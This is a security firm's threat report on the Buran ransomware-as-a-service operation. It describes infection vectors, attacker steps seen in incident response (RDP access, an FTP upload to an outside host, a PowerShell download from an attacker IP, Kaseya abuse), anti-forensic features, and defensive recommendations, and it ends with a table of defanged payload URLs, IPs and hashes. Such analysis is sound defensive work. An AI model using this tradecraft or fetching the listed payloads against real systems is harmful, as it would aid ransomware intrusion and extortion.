Tue, Feb 18, 2020

Malware Analysis - Buran Ransomware-as-a-Service

Kroll analysts have observed Buran ransomware-as-a-service is one of the numerous ransomware variants operating as a RaaS program.

In September 2019, Kroll reported on Buran ransomware-as-a-service (RaaS) being offered on the top-tier Russian Forum, Exploit. Buran is one of the numerous ransomware variants operating as a RaaS program; in Buran’s case, affiliate distributors give 25% of their ransom profits to “buransupport” to obtain a decryption key. In November 2019, the actors behind the “buransupport” moniker began to advertise a second ransomware variant, Zeppelin, which has been observed to have data exfiltration capabilities. Kroll assesses that this new feature may have been prompted by the tactics of other ransomware threat actor groups, who are actively publicizing data stolen from victims who have refused to pay ransom demands. 

Since Buran’s launch, Kroll analysts have observed multiple updates to the ransomware being advertised on dark web forums. In addition to being spread via RIG exploit kits and malspam campaigns, Kroll incident responders have also observed Buran being spread via misconfigured Remote Desktop Protocol (RDP). 

Buran is advertised as a fully offline crypto-locker written in Delphi code that claims to work on every Windows operating system, starting with Windows XP/Windows Server 2003. (See Figure 1 for a representative dark web listing.) Based on tactics, techniques and procedures (TTPs), Buran is considered to be a variant of VegaLocker ransomware. 

Attack Vector

Infection vectors vary based on the specific version of Buran; primary methods have involved a RIG exploit kit1 or malspam:

  • Version I was spread via CVE-2018-8174, a Microsoft Internet Explorer VBScript Engine Remote Code Execution (RCE) vulnerability, which could corrupt memory, allowing an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited this could gain the same user rights as the current user.2 

  • Version II was reported by open sources to being spread by various malspam campaigns: 

    • One malspam campaign targeted various German entities via an eFax-themed email message that contained an infected Microsoft Word document that downloaded the Buran payload. 

    • Another campaign spread Buran to victim hosts via Microsoft Excel Web Queries (i.e., IQY mail attachments).

    • Kroll assesses that malspam campaigns distributing Buran and Maze ransomware may be connected, due to a shared email address observed in Start of Authority (SOA) records for multiple campaigns.

Kroll-Observed Attack Vector

Kroll incident response teams have observed the ransomware spreading via RDP access coupled with privilege escalation. In one case, an organization’s RDP was misconfigured to be open to the internet:

  • Attackers connected to the network via RDP over port 3389 from the IP address 98.110.78[.]226

  • Once inside the network, attackers connected 53 times from 14 unique IP addresses to three separate accounts

  • One of the compromised RDP accounts established an FTP session with ftp://ftp.bit[.]nl/upload. The FTP connection occurred before any privilege escalation or network reconnaissance. 

  • The FTP activity was followed by privilege escalation along with network reconnaissance. Kroll assessed it was likely that credential harvesting tools (e.g., Mimikatz) were utilized via the RDP accounts to capture credentials to gain access to the administrator level. 

  • Once the actor gained access to the administrator level, Buran was deployed (buran_2019-06-28_04-40[.]exe).  

In another Kroll investigation, the actor(s) actively cleared event logs and deleted Windows volume snapshots, making it difficult to ascertain the initial infection vector:

  • As for the attack itself, a batch file (def.bat) was executed that contained PowerShell script to download from IP address 45.142.213.167, which geolocated to Russia at the time of the investigation.

    • PowerShell is a native component of the Windows operating system used by administrators. For this reason, a malicious PowerShell script is potentially less likely to be detected than other attacker methods.

  • Seconds later, the Buran binary was uploaded to the client’s Kaseya server via the portal (/SystemTab/uploader.aspx). 

  • The actor(s) then used the Kaseya server to push out tools and the ransomware to target systems. 

Dark Web Updates

Kroll has observed that since being advertised in May 2019, Buran has been updated on six separate occasions. 

  • During a notable update in June 2019, Buran was enhanced to support a PowerShell script that contains the Buran bootloader. (See Figure 2 for dark web update listing.)

  • The actor behind the “buransupport” moniker advertised an additional update to Buran on January 16, 2020. No details were provided on new features of this build. 

  • “Buransupport” is also advertising a second ransomware variant, Zeppelin, which has been observed to have data exfiltration capabilities. Zeppelin was first advertised in November 2019 on Russian forums. It is similar to Buran as they are both variants of the VegaLocker family and Delphi code based.

  • Zeppelin ransomware is extremely configurable and is able to be deployed as EXE Startup and IOCsStartup and IOCs

Startup and IOCs

  • Dark web ads for Buran claim the ransomware can scan local drives and network paths, delete recovery points and encrypt without changing file extensions. 

  • Leverages several anti-forensic measures, such as clearing Windows event logs and disabling the Windows event log service prior to encrypting the victim host
    Numerous indicators of compromise exist for Buran. (See Figure 3 for a list of IOCs current as of this writing.)

  • Buran authors have built in an abort feature if a scan of the victim host detects it is registered in one of the former Soviet Russia Commonwealth of Independent States (CIS) or Ukraine

  • Buran encrypts all files unless the file name, extension or directory has not been included. Buran does not encrypt the following extensions: 

  • .bat

  • .buran

  • .cmd

  • .com

  • .cpl

  • .dll

  • .exe

  • .lnk

  • .log

  • .msc

  • .msp

  • .pif

  • .scr

  • .sys

Preemptive Recommendations

  • Maintain consistent backups. Recovery is always easier if organizations have a valid and intact backup system. Offline backups make it even harder for attackers to compromise data. 

  • Conduct routine security risk assessments. These include vulnerability and penetration testing to decrease the likelihood of infection. 

  • Implement an endpoint monitoring, detection and response solution.
    Use a firewall to prevent public access to the service message block (SMB/port 445) and the Remote Desktop Protocol (RDP/port 3389).

  • Apply two-factor authentication (2FA) to user log-in credentials and implement least privilege for file, directory and network share permissions.

Malware Analysis – Buran Ransomware-as-a-Service

Figure 1 – Buran listing on dark web

Malware Analysis – Buran Ransomware-as-a-Service

Figure 2 – Dark Web Listing, June 2019 Update to Buran Supporting PowerShell Bootloader

 IOC

Type

Description

 45.142.213.167

 IP Address

Identified in bat.exe file - download attempt

 hxxp://45.142.213.167/oxf

 URL

URLs hosted on this IP address: 45.142.213.167

 hxxp://45.142.213.167/reg

 URL

URLs hosted on this IP address: 45.142.213.167

 hxxp://192.119.68.225/wordupd1.tmp

 Payload

 

 hxxp://108.174.199.10/wordupd3.tmp

 Payload

 

 hxxp://54.39.233.175/wupd19823.tmp

 Payload

 

 hxxp://54.39.233.131/word1.tmp

 Payload

 

 def.exe 

 exe

Disables Windows Defender; hides the control panel; contacts 45.142.213.167; found in C:\temp

 bat.exe

 exe toolset

Actor toolset; found in C:\temp
Hash: c293aa92c1903c770eeb1b86b638467a3fd4058918880e33f73d96e05987825f

 

 Advanced_Port_Scanner_2.5.3869.exe

 

Port scanner, network reconnaissance tool

 

 buran_2019-06-28_04-40.exe

 

Buran ransomware

 Everything.exe

 

Windows system reconnaissance tool

 load.exe

 

Unknown, unrecoverable

 lsass_2006.exe

 

Unrecoverable, likely credential stealing malware based on name

 lsass_2206.exe

 

Unrecoverable, likely credential stealing malware based on name

 mimikatz.exe

 

Unrecoverable, likely credential stealing malware based on name

 Processhacker-2.39-setup.exe

 

ProcessHacker – Windows process auditing tool

 Total-Uninstall-Setup-6.23.0.exe

 

Total Uninstaller application uninstaller tool

 TUPortable_6.3.4.100_32bit_64bit_Multilingual.paf.exe

 

Total Uninstaller application uninstaller tool

 unlocker.exe

 

Windows file unlocking tool

 Ilivenutm_trWorldwidepop
&utm_source=307391625&utm_cost=0[.]0007

 

 

 filestake@tutanota[.]com

 

 

 polssh1@protonmail[.]com

 

 

 polsshprotonmail[.]com

 

 

 unique10@protonmail[.]com

 

 

 rizonlocker@airmail[.]cc

 

 

 realtime5@protonmail[.]com

 

 

 wtfsupport@airmail[.]cc

 

 

 wtfsupport@cock[.]li

 

 

 filestake@mailfence[.]com

 

 

 rizonlocker@firemail[.]cc

 

 

 61fd307906f8755516f0acd2e59c25dc

 

 

 e60e767e33acf49c02568a79d9cbdadd

 

 

 5c9fc92ab44374e1fdafd49808b2f638

 

 

 f88de5fc23b74f5066777e120232735f

 

 

 55030a1c4072b1b0b3c33ba32003b8b5

 

 

 4266d31978d357c618c5839404850910

 

 

Figure 3 - Indicators of Compromise (as of this alert)3

 

Sources
1 Exploit kit (“EK”) is a set/toolkit of software designed to exploit a security vulnerability in other software. 
2 hxxps://fortiguard.com/encyclopedia/endpoint-vuln/57091
3 IOC information was obtained via multiple sources including Kroll incident response data. Contact Kroll for more information on sourcing. 



Cyber Risk

Incident response, digital forensics, breach notification, managed detection services, penetration testing, cyber assessments and advisory.

24x7 Incident Response

Kroll is the largest global IR provider with experienced responders who can handle the entire security incident lifecycle.

CyberDetectER

Proactively monitor, detect and respond to threats virtually anywhere – on endpoints and throughout the surface, deep and dark web.


Identity Theft and Breach Notification

Services include drafting communications, full-service mailing, alternate notifications.